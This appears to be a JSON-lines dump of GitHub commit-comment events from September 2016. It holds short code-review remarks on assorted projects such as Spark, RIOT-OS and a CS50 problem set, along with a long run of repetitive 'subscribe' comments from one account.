{"id":"4640999114","type":"CommitCommentEvent","actor":{"login":"immesys"},"repo":{"name":"hamilton-mote/RIOT-OS"},"payload":{"comment":{"id":19235153,"position":null,"line":null,"path":null,"commit_id":"3945e68cb868a2a9dde517310b4b254b9ccf5170","created_at":"2016-09-30T01:45:50Z","updated_at":"2016-09-30T01:45:50Z","body":"but why this still breaks on my pc??"}},"created_at":"2016-09-30T01:45:50Z"}
{"id":"4640999710","type":"CommitCommentEvent","actor":{"login":"samnabi"},"repo":{"name":"samnabi/shopkit"},"payload":{"comment":{"id":19235155,"position":2,"line":1,"path":"site/languages/de.php","commit_id":"31d56565027b0e227d46f72b8f5cf01ab6e7b01a","created_at":"2016-09-30T01:46:05Z","updated_at":"2016-09-30T01:46:05Z","body":"Looks like I let the find & replace get a little out of hand! Good catch."}},"created_at":"2016-09-30T01:46:05Z"}
{"id":"4640999748","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235156,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:46:06Z","updated_at":"2016-09-30T01:46:06Z","body":"subscribe 187"}},"created_at":"2016-09-30T01:46:06Z"}
{"id":"4641001150","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235157,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:46:40Z","updated_at":"2016-09-30T01:46:40Z","body":"subscribe 188"}},"created_at":"2016-09-30T01:46:40Z"}
{"id":"4641002563","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235158,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:47:11Z","updated_at":"2016-09-30T01:47:11Z","body":"subscribe 189"}},"created_at":"2016-09-30T01:47:11Z"}
{"id":"4641002879","type":"CommitCommentEvent","actor":{"login":"mtrojnar"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19235159,"position":14,"line":280,"path":"src/libp11-int.h","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-30T01:47:18Z","updated_at":"2016-09-30T01:47:18Z","body":"Feel free to submit a PR if you need this feature.\r\n\r\nBTW: `SET_USER_INTERFACE` is currently only implemented in `e_chil.c`."}},"created_at":"2016-09-30T01:47:18Z"}
{"id":"4641003981","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235165,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:47:43Z","updated_at":"2016-09-30T01:47:43Z","body":"subscribe 190"}},"created_at":"2016-09-30T01:47:43Z"}
{"id":"4641005233","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235169,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:48:12Z","updated_at":"2016-09-30T01:48:12Z","body":"subscribe 191"}},"created_at":"2016-09-30T01:48:12Z"}
{"id":"4641006476","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235173,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:48:41Z","updated_at":"2016-09-30T01:48:41Z","body":"subscribe 192"}},"created_at":"2016-09-30T01:48:41Z"}
{"id":"4641007644","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235176,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:49:10Z","updated_at":"2016-09-30T01:49:10Z","body":"subscribe 193"}},"created_at":"2016-09-30T01:49:10Z"}
{"id":"4641008401","type":"CommitCommentEvent","actor":{"login":"immesys"},"repo":{"name":"hamilton-mote/RIOT-OS"},"payload":{"comment":{"id":19235178,"position":null,"line":null,"path":null,"commit_id":"3945e68cb868a2a9dde517310b4b254b9ccf5170","created_at":"2016-09-30T01:49:28Z","updated_at":"2016-09-30T01:49:28Z","body":"Ok so it works as long as I remove the radio send. If I add the radio send, everything breaks. There must be some timing-specific thing going on there :(\r\n"}},"created_at":"2016-09-30T01:49:28Z"}
{"id":"4641008804","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235180,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:49:38Z","updated_at":"2016-09-30T01:49:38Z","body":"subscribe 194"}},"created_at":"2016-09-30T01:49:38Z"}
{"id":"4641010137","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235187,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:50:08Z","updated_at":"2016-09-30T01:50:08Z","body":"subscribe 195"}},"created_at":"2016-09-30T01:50:08Z"}
{"id":"4641011879","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235191,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:50:47Z","updated_at":"2016-09-30T01:50:47Z","body":"subscribe 196"}},"created_at":"2016-09-30T01:50:47Z"}
{"id":"4641013240","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235193,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:51:17Z","updated_at":"2016-09-30T01:51:17Z","body":"subscribe 197"}},"created_at":"2016-09-30T01:51:17Z"}
{"id":"4641014329","type":"CommitCommentEvent","actor":{"login":"chris3torek"},"repo":{"name":"freenas/py-cam"},"payload":{"comment":{"id":19235197,"position":14,"line":158,"path":"cam.pyx","commit_id":"264583ce0688972be82c4a60c68ceb0e476988f0","created_at":"2016-09-30T01:51:43Z","updated_at":"2016-09-30T01:51:43Z","body":"Doesn't this need to be `unsigned char`?  (I couldn't find any clear statement on the signedness of plain `char` in Cython...)"}},"created_at":"2016-09-30T01:51:43Z"}
{"id":"4641014525","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235198,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:51:47Z","updated_at":"2016-09-30T01:51:47Z","body":"subscribe 198"}},"created_at":"2016-09-30T01:51:47Z"}
{"id":"4641015822","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235204,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:52:18Z","updated_at":"2016-09-30T01:52:18Z","body":"subscribe 199"}},"created_at":"2016-09-30T01:52:18Z"}
{"id":"4641016226","type":"CommitCommentEvent","actor":{"login":"besanradwan"},"repo":{"name":"besanradwan/rpc-perf-scripts"},"payload":{"comment":{"id":19235208,"position":null,"line":null,"path":null,"commit_id":"276c1f1c0bfc8223eac1c2309f6f76bd12fd13cb","created_at":"2016-09-30T01:52:27Z","updated_at":"2016-09-30T01:52:27Z","body":"@vhe182 fixed!"}},"created_at":"2016-09-30T01:52:27Z"}
{"id":"4641016578","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235210,"position":8,"line":32,"path":"src/main/webapp/WEB-INF/foodmeeting/settingMeeting.jsp","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T01:52:37Z","updated_at":"2016-09-30T01:52:37Z","body":"I think this whole script can be wrapped with the \"document ready statement\". Could you please give it a try?. Also lets use the jquery short hand for document ready : https://learn.jquery.com/using-jquery-core/document-ready/"}},"created_at":"2016-09-30T01:52:37Z"}
{"id":"4641016956","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235212,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:52:47Z","updated_at":"2016-09-30T01:52:47Z","body":"subscribe 200"}},"created_at":"2016-09-30T01:52:47Z"}
{"id":"4641017589","type":"CommitCommentEvent","actor":{"login":"JordanRoth"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19235215,"position":null,"line":null,"path":null,"commit_id":"bb6ea1285706fe0b9225a35f098a8d2e2496babd","created_at":"2016-09-30T01:53:03Z","updated_at":"2016-09-30T01:53:03Z","body":"@CPSC310Bot "}},"created_at":"2016-09-30T01:53:03Z"}
{"id":"4641017669","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19235216,"position":null,"line":null,"path":null,"commit_id":"bb6ea1285706fe0b9225a35f098a8d2e2496babd","created_at":"2016-09-30T01:53:04Z","updated_at":"2016-09-30T01:53:04Z","body":"Request cannot be processed; not registered."}},"created_at":"2016-09-30T01:53:04Z"}
{"id":"4641018067","type":"CommitCommentEvent","actor":{"login":"AnanyaGawande"},"repo":{"name":"AnanyaGawande/captcha"},"payload":{"comment":{"id":19235218,"position":null,"line":null,"path":null,"commit_id":"0998690893c27a43b777d944e65cfaa147f1de31","created_at":"2016-09-30T01:53:14Z","updated_at":"2016-09-30T01:53:14Z","body":"not too complicated code\r\n"}},"created_at":"2016-09-30T01:53:14Z"}
{"id":"4641018375","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235219,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:53:22Z","updated_at":"2016-09-30T01:53:22Z","body":"subscribe 201"}},"created_at":"2016-09-30T01:53:22Z"}
{"id":"4641019796","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235225,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:53:57Z","updated_at":"2016-09-30T01:53:57Z","body":"subscribe 202"}},"created_at":"2016-09-30T01:53:57Z"}
{"id":"4641020454","type":"CommitCommentEvent","actor":{"login":"koeninger"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19235228,"position":32,"line":139,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"9d95d52cd1cb9ef83efaaadc5d4e9a5dc3e1c843","created_at":"2016-09-30T01:54:13Z","updated_at":"2016-09-30T01:54:13Z","body":"This should be true by default in my opinion.  That more closely matches the behavior of the current stream"}},"created_at":"2016-09-30T01:54:13Z"}
{"id":"4641020840","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":19235232,"position":null,"line":null,"path":null,"commit_id":"84b7ebdf425a25731425541fbd8ca643a6396e6e","created_at":"2016-09-30T01:54:21Z","updated_at":"2016-09-30T01:54:21Z","body":"The `a.defined` check can go away"}},"created_at":"2016-09-30T01:54:21Z"}
{"id":"4641021034","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235233,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:54:27Z","updated_at":"2016-09-30T01:54:27Z","body":"subscribe 203"}},"created_at":"2016-09-30T01:54:27Z"}
{"id":"4641022279","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235235,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:54:57Z","updated_at":"2016-09-30T01:54:57Z","body":"subscribe 204"}},"created_at":"2016-09-30T01:54:57Z"}
{"id":"4641023466","type":"CommitCommentEvent","actor":{"login":"gao-feng"},"repo":{"name":"hyperhq/hyperstart"},"payload":{"comment":{"id":19235237,"position":186,"line":325,"path":"src/init.c","commit_id":"6a15977238bc34b3c3c98e52be6128893efc1936","created_at":"2016-09-30T01:55:23Z","updated_at":"2016-09-30T01:55:23Z","body":"Hi @devimc pod-init is running in a new pidns, remounting /proc will help pod-init to know the processes that running in the same pidns with it. Though after some refactor, pod-init doesn't access /proc anymore, it's still good to provide a correct proc file system for pod-init.\r\n\r\nAre there some troubles this remounting operation brings to you?"}},"created_at":"2016-09-30T01:55:23Z"}
{"id":"4641023617","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235238,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:55:27Z","updated_at":"2016-09-30T01:55:27Z","body":"subscribe 205"}},"created_at":"2016-09-30T01:55:27Z"}
{"id":"4641024097","type":"CommitCommentEvent","actor":{"login":"tooomm"},"repo":{"name":"mkiol/GNotifier"},"payload":{"comment":{"id":19235240,"position":null,"line":null,"path":null,"commit_id":"d39d2af65365684c77ab75b6ee8b6acc12c0c537","created_at":"2016-09-30T01:55:39Z","updated_at":"2016-09-30T01:55:39Z","body":"Suggestion for improvement:\r\n\r\n\"Icon used in the Download Complete and New E-mail notifications. It could be icon URL or the name. ...\r\n---> \"Icon used for \"Download Complete\" and \"New E-mail\" notifications. It can be either icon URL or name. ..."}},"created_at":"2016-09-30T01:55:39Z"}
{"id":"4641025098","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235244,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:56:04Z","updated_at":"2016-09-30T01:56:04Z","body":"subscribe 206"}},"created_at":"2016-09-30T01:56:04Z"}
{"id":"4641025156","type":"CommitCommentEvent","actor":{"login":"soumith"},"repo":{"name":"gchanan/cunn"},"payload":{"comment":{"id":19235245,"position":1,"line":1,"path":"lib/THCUNN/HalfAutoNumerics.cuh","commit_id":"045cdc30107043857e24dad37ea3563dae9e7206","created_at":"2016-09-30T01:56:05Z","updated_at":"2016-09-30T01:56:05Z","body":"change this to THCHalfAutoNumerics.cuh, we'll move this into THC at the end of finishing up the PR"}},"created_at":"2016-09-30T01:56:05Z"}
{"id":"4641026445","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235249,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:56:33Z","updated_at":"2016-09-30T01:56:33Z","body":"subscribe 207"}},"created_at":"2016-09-30T01:56:33Z"}
{"id":"4641026885","type":"CommitCommentEvent","actor":{"login":"koeninger"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19235250,"position":60,"line":275,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"9d95d52cd1cb9ef83efaaadc5d4e9a5dc3e1c843","created_at":"2016-09-30T01:56:43Z","updated_at":"2016-09-30T01:56:43Z","body":"What ever became of the discussion for the name of the parameter?  The \"backfill\" suggestion at least is better than calling something an offset that isn't."}},"created_at":"2016-09-30T01:56:43Z"}
{"id":"4641027834","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235253,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:57:04Z","updated_at":"2016-09-30T01:57:04Z","body":"subscribe 208"}},"created_at":"2016-09-30T01:57:04Z"}
{"id":"4641028541","type":"CommitCommentEvent","actor":{"login":"nqv"},"repo":{"name":"ExpediaInc/ConnectivityContent"},"payload":{"comment":{"id":19235255,"position":13,"line":213,"path":"test-properties/schedules.html","commit_id":"2700c28387550c242d91634a4ccbfe5a6f489acb","created_at":"2016-09-30T01:57:18Z","updated_at":"2016-09-30T01:57:18Z","body":"Missing </a>"}},"created_at":"2016-09-30T01:57:18Z"}
{"id":"4641028543","type":"CommitCommentEvent","actor":{"login":"lvdream"},"repo":{"name":"lvdream/lvdream.github.io"},"payload":{"comment":{"id":19235256,"position":null,"line":null,"path":null,"commit_id":"c116a503a7f1f7c4a8cb28b21f59d417e6e5d7c4","created_at":"2016-09-30T01:57:18Z","updated_at":"2016-09-30T01:57:18Z","body":"first submit"}},"created_at":"2016-09-30T01:57:18Z"}
{"id":"4641029850","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235257,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:57:39Z","updated_at":"2016-09-30T01:57:39Z","body":"subscribe 209"}},"created_at":"2016-09-30T01:57:39Z"}
{"id":"4641032470","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235261,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:58:23Z","updated_at":"2016-09-30T01:58:23Z","body":"subscribe 210"}},"created_at":"2016-09-30T01:58:23Z"}
{"id":"4641033858","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235265,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:58:54Z","updated_at":"2016-09-30T01:58:54Z","body":"subscribe 211"}},"created_at":"2016-09-30T01:58:54Z"}
{"id":"4641034531","type":"CommitCommentEvent","actor":{"login":"rgbriggs"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19235266,"position":87,"line":87,"path":"tests/filter_sessionid/test","commit_id":"2584bcc842da7511dbac3482f2eaf2afc6f2db39","created_at":"2016-09-30T01:59:10Z","updated_at":"2016-09-30T01:59:10Z","body":"Ok, line 87 and 88 I've added a check for ses captured value is not equal to \"unset\", and I've fixed the number of tests it expects in this script.  See https://github.com/rgbriggs/audit-testsuite/commit/ec6d30f873f43d2aa83c64c3384315ab86eafaf5"}},"created_at":"2016-09-30T01:59:10Z"}
{"id":"4641035319","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235268,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T01:59:28Z","updated_at":"2016-09-30T01:59:28Z","body":"subscribe 212"}},"created_at":"2016-09-30T01:59:28Z"}
{"id":"4642538711","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19238738,"position":null,"line":null,"path":null,"commit_id":"833d08f7465e6a17e583a4543f88cfcf2e2543f4","created_at":"2016-09-30T10:00:01Z","updated_at":"2016-09-30T10:00:01Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Améliorer l'affichage des champs descriptifs (titre la page, description de la page, etc.)](https://trello.com/c/IhHoegXg/36-ameliorer-l-affichage-des-champs-descriptifs-titre-la-page-description-de-la-page-etc)"}},"created_at":"2016-09-30T10:00:01Z"}
{"id":"4642541620","type":"CommitCommentEvent","actor":{"login":"Alfiva"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19238747,"position":41,"line":338,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/cryptographic/CryptographicOntology.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-30T10:00:32Z","updated_at":"2016-09-30T10:00:32Z","body":"It looks fine to me. Of course, the key here is \"TO BE TESTED\" ;)"}},"created_at":"2016-09-30T10:00:32Z"}
{"id":"4642543269","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19238754,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T10:00:52Z","updated_at":"2016-09-30T10:00:52Z","body":"The order is changed to only have a proper debugging. "}},"created_at":"2016-09-30T10:00:52Z"}
{"id":"4642544331","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19238756,"position":19,"line":13,"path":"tmdb_posters.rb","commit_id":"a386683e2dc64d4d6e5a8c6171e3ef6591794fcc","created_at":"2016-09-30T10:01:05Z","updated_at":"2016-09-30T10:01:05Z","body":"Тебе не кажется, что знать свой imdb_id — это вообще-то обязанность фильма?"}},"created_at":"2016-09-30T10:01:05Z"}
{"id":"4642545021","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"Defunktt1/pset3"},"payload":{"comment":{"id":19238760,"position":128,"line":128,"path":"fifteen.c","commit_id":"c5dc9354fa58d25e4094f34946dd5e4b654620ff","created_at":"2016-09-30T10:01:14Z","updated_at":"2016-09-30T10:01:14Z","body":"It would be more simple if we'd make function like `s_to_ms` or `seconds_to_milliseconds` and use it with `usleep`"}},"created_at":"2016-09-30T10:01:14Z"}
{"id":"4642549510","type":"CommitCommentEvent","actor":{"login":"mawanikrishna"},"repo":{"name":"mawanikrishna/Demand-Prediction"},"payload":{"comment":{"id":19238774,"position":null,"line":null,"path":null,"commit_id":"f86c5e585a5718187445939727a5b9d77487266a","created_at":"2016-09-30T10:02:10Z","updated_at":"2016-09-30T10:02:10Z","body":"#have made the changes to remove hard coding. this will work depending on the number of lag variables. However, an error occurs when max_corr is run. Can you please look into it and let me know what the error is. I am unable to trace that."}},"created_at":"2016-09-30T10:02:10Z"}
{"id":"4642549865","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"Defunktt1/pset3"},"payload":{"comment":{"id":19238775,"position":163,"line":163,"path":"fifteen.c","commit_id":"c5dc9354fa58d25e4094f34946dd5e4b654620ff","created_at":"2016-09-30T10:02:15Z","updated_at":"2016-09-30T10:02:15Z","body":"`tile_number` ?"}},"created_at":"2016-09-30T10:02:15Z"}
{"id":"4642553798","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"Defunktt1/pset3"},"payload":{"comment":{"id":19238781,"position":184,"line":184,"path":"fifteen.c","commit_id":"c5dc9354fa58d25e4094f34946dd5e4b654620ff","created_at":"2016-09-30T10:03:09Z","updated_at":"2016-09-30T10:03:09Z","body":"It's good practice to always wrap if/else statements with curly braces `{ }`"}},"created_at":"2016-09-30T10:03:09Z"}
{"id":"4642555173","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19238784,"position":21,"line":15,"path":"tmdb_posters.rb","commit_id":"a386683e2dc64d4d6e5a8c6171e3ef6591794fcc","created_at":"2016-09-30T10:03:28Z","updated_at":"2016-09-30T10:03:28Z","body":"Может быть, имеет смысл иметь метод вроде `translations(imdb_id)`? Его проще протестировать, а отсюда просто вызывать. Ну и польза с него может быть в других контекстах (использовать твою либу чтобы получить ровно один перевод)"}},"created_at":"2016-09-30T10:03:28Z"}
{"id":"4642560032","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19238793,"position":20,"line":14,"path":"tmdb_posters.rb","commit_id":"a386683e2dc64d4d6e5a8c6171e3ef6591794fcc","created_at":"2016-09-30T10:04:32Z","updated_at":"2016-09-30T10:04:32Z","body":"Эта конструкция повторяется выше ;) Наверное, имеет смысл в этом модуле сделать `imdb_to_tmdb(imdb_id)` (и в нём устроить кеш соответствий, чтобы каждый раз не лезло на TMDB заново), м?"}},"created_at":"2016-09-30T10:04:32Z"}
{"id":"4642560947","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238796,"position":137,"line":157,"path":"atlas-api/src/main/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutor.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:04:44Z","updated_at":"2016-09-30T10:04:44Z","body":"```\r\nImmutableSet<id> regionIds = platform.getRegions()\r\n    .stream()\r\n    .map(ChannelGroupRef::getId)\r\n    .collect(MoreCollectors.toImmutableSet());\r\n```"}},"created_at":"2016-09-30T10:04:44Z"}
{"id":"4642565900","type":"CommitCommentEvent","actor":{"login":"schnubor"},"repo":{"name":"styladev/octobercms"},"payload":{"comment":{"id":19238806,"position":null,"line":null,"path":null,"commit_id":"b0eaf216c1c3676de99a6e69b38e3113db0938c7","created_at":"2016-09-30T10:05:51Z","updated_at":"2016-09-30T10:05:51Z","body":"`<noscript><style>#stylaSEO { display: block !important; }</style></noscript>` needs to be placed in the `<head>` section."}},"created_at":"2016-09-30T10:05:51Z"}
{"id":"4642567626","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":19238812,"position":null,"line":null,"path":null,"commit_id":"dc7679e2fb358a4184f76c1f06ade8a0682a6c7c","created_at":"2016-09-30T10:06:14Z","updated_at":"2016-09-30T10:06:14Z","body":"Done! https://github.com/NicolasPetton/zerodark-theme#mode-line-format-optional"}},"created_at":"2016-09-30T10:06:14Z"}
{"id":"4642567711","type":"CommitCommentEvent","actor":{"login":"appdevdesigns"},"repo":{"name":"appdevdesigns/appdev-opsportal"},"payload":{"comment":{"id":19238813,"position":null,"line":null,"path":null,"commit_id":"b40932b388ff8e231036aae6e4ddee12499a173a","created_at":"2016-09-30T10:06:16Z","updated_at":"2016-09-30T10:06:16Z","body":"#99 "}},"created_at":"2016-09-30T10:06:16Z"}
{"id":"4642568922","type":"CommitCommentEvent","actor":{"login":"frbattid"},"repo":{"name":"telefonicaid/fiware-cygnus"},"payload":{"comment":{"id":19238816,"position":8,"line":97,"path":"cygnus-common/src/main/java/com/telefonica/iot/cygnus/backends/postgresql/PostgreSQLCache.java","commit_id":"ef962c870b8d227683c1ab1b4b7e40cfc10490a6","created_at":"2016-09-30T10:06:31Z","updated_at":"2016-09-30T10:06:31Z","body":"Instead of doing this, which loops twice (one in order to check if the schema exists, another in order to put the table), try the following: iterate on the schemas, and once found add the table. If not found, nothing is done."}},"created_at":"2016-09-30T10:06:31Z"}
{"id":"4642571260","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"Defunktt1/pset3"},"payload":{"comment":{"id":19238818,"position":75,"line":75,"path":"fifteen.c","commit_id":"c5dc9354fa58d25e4094f34946dd5e4b654620ff","created_at":"2016-09-30T10:07:03Z","updated_at":"2016-09-30T10:07:03Z","body":"we can check for `won() || exit()` here"}},"created_at":"2016-09-30T10:07:03Z"}
{"id":"4642572854","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238824,"position":148,"line":168,"path":"atlas-api/src/main/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutor.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:07:25Z","updated_at":"2016-09-30T10:07:25Z","body":"You can get rid of the try-catch with:\r\n\r\n```\r\nPromise.wrap(resolver.resolveIds(regionsIds)\r\n    .then(input -> input.getResources())\r\n    .get(1, TimeUnit.MINUTES);\r\n```\r\n\r\nThis will be easier to read and also already does `Throwables.propagate(e);` behind the scenes"}},"created_at":"2016-09-30T10:07:25Z"}
{"id":"4642573861","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19238830,"position":null,"line":null,"path":null,"commit_id":"f3b58e368d50b94eedcb8a76f88b411eafa6cd40","created_at":"2016-09-30T10:07:39Z","updated_at":"2016-09-30T10:07:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Zy3rvGtiQ0SU1ec82skDag"}},"created_at":"2016-09-30T10:07:39Z"}
{"id":"4642574345","type":"CommitCommentEvent","actor":{"login":"Alfiva"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19238832,"position":19,"line":71,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/CryptographicFactory.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-30T10:07:46Z","updated_at":"2016-09-30T10:07:46Z","body":"Not sure if this is what you want to achieve, but are you talking about havein, say, a AES resource with its AES_URI, and then there are no \"instances\" of it? Like a resource with MY_OWN_URI cannot be of AES class. In that case, I think what you are looking for is to make AES an Abstract Ont Class. These are specific of uAAL data representation, and in this case, you would not have to do anything about them in the ResourceFactory - just ignore them."}},"created_at":"2016-09-30T10:07:46Z"}
